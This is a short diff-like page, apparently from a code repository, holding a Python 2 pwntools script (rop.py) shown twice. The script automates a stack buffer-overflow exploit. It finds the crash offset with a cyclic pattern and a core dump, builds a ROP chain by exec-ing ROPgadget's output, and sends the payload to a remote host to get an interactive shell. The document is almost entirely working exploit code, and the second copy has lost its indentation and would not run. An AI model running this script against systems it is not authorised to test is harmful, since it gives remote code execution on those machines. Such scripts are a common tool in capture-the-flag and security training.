karimmuya · July 27, 2022 19:05
diff --git a/rop.py b/rop.py
 #!/usr/bin/python2
 from pwn import *
 from subprocess import Popen, PIPE
 import sys

 context.log_level = "DEBUG"

 if len(sys.argv) != 4:
    print("usage{}[BINARY] [HOST][PORT]".format(sys.argv[0]))
    exit(0)

 context.binary = sys.argv[1]
 port = sys.argv[3]
 host = sys.argv[2]

 t = process(context.binary.path)
 # payload=cyclic()
 t.sendline(cyclic(1024))
 t.wait()
 t.close()

 core = Coredump("./core")
 off = cyclic_find(core.fault_addr)
 log.info("offset found:{}".format(off))

 stdout = Popen(["ROPgadget", "--ropchain", "--binary",
               context.binary.path], stdout=PIPE).communicate()[0]
 stdout = stdout.decode("utf-8")
 print(stdout)
 pycode = stdout[stdout.find("#!"):].replace("\t", "")
 exec(pycode)
 ropchain = p

 log.info("{}".format(ropchain))
 # t=process(context.binary.path)
 t = remote(host, port)
 t.sendline(fit({off: ropchain}))
 t.interactive()
 t.close()
	#!/usr/bin/python2
	from pwn import *
	from subprocess import Popen, PIPE
	import sys

	context.log_level = "DEBUG"

	if len(sys.argv) != 4:
	print("usage{}[BINARY] [HOST][PORT]".format(sys.argv[0]))
	exit(0)

	context.binary = sys.argv[1]
	port = sys.argv[3]
	host = sys.argv[2]

	t = process(context.binary.path)
	# payload=cyclic()
	t.sendline(cyclic(1024))
	t.wait()
	t.close()

	core = Coredump("./core")
	off = cyclic_find(core.fault_addr)
	log.info("offset found:{}".format(off))

	stdout = Popen(["ROPgadget", "--ropchain", "--binary",
	context.binary.path], stdout=PIPE).communicate()[0]
	stdout = stdout.decode("utf-8")
	print(stdout)
	pycode = stdout[stdout.find("#!"):].replace("\t", "")
	exec(pycode)
	ropchain = p

	log.info("{}".format(ropchain))
	# t=process(context.binary.path)
	t = remote(host, port)
	t.sendline(fit({off: ropchain}))
	t.interactive()
	t.close()